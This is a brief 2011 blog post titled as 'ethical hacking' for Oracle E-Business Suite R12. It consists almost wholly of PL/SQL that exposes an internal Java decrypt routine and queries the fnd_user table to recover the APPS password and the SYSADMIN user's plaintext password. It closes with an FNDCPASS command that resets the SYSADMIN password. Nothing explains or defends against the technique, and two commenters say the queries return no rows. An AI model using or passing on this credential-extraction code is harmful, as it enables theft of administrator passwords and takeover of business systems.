Monday 4 April 2011

Oracle Apps R12: Ethical hacking

CREATE OR REPLACE PACKAGE xxgetpasswd AS FUNCTION decrypt ( KEY IN VARCHAR2 ,VALUE IN VARCHAR2 ) RETURN VARCHAR2; END xxgetpasswd;

CREATE OR REPLACE PACKAGE BODY xxgetpasswd AS FUNCTION decrypt ( KEY IN VARCHAR2 ,VALUE IN VARCHAR2 ) RETURN VARCHAR2 AS LANGUAGE JAVA NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String'; END xxgetpasswd;


SELECT (SELECT xxgetpasswd.decrypt (UPPER ((SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) FROM DUAL)), usertable.encrypted_foundation_password)
FROM DUAL) AS apps_password
FROM fnd_user usertable
WHERE usertable.user_name LIKE UPPER ((SELECT SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD') ,1 , INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'), '/') - 1 ) FROM DUAL));

SELECT usertable.user_name , (SELECT xxgetpasswd.decrypt (UPPER ((SELECT (SELECT xxgetpasswd.decrypt (UPPER ((SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) FROM DUAL)), usertable.encrypted_foundation_password) FROM DUAL) AS apps_password FROM fnd_user usertable WHERE usertable.user_name LIKE UPPER ((SELECT SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD') ,1 , INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'), '/') - 1 ) FROM DUAL)))) ,usertable.encrypted_user_password) FROM DUAL) AS encrypted_user_password
FROM   fnd_user usertable
WHERE usertable.user_name LIKE UPPER ('SYSADMIN')


Change sysadmin password:

FNDCPASS apps/apps 0 Y system/sys USER SYSADMIN Admin1234

2 comments:

  1. Its not working result is
    no rows returned

    ReplyDelete
  2. yes ...it does not work

    ReplyDelete

Number of Visitors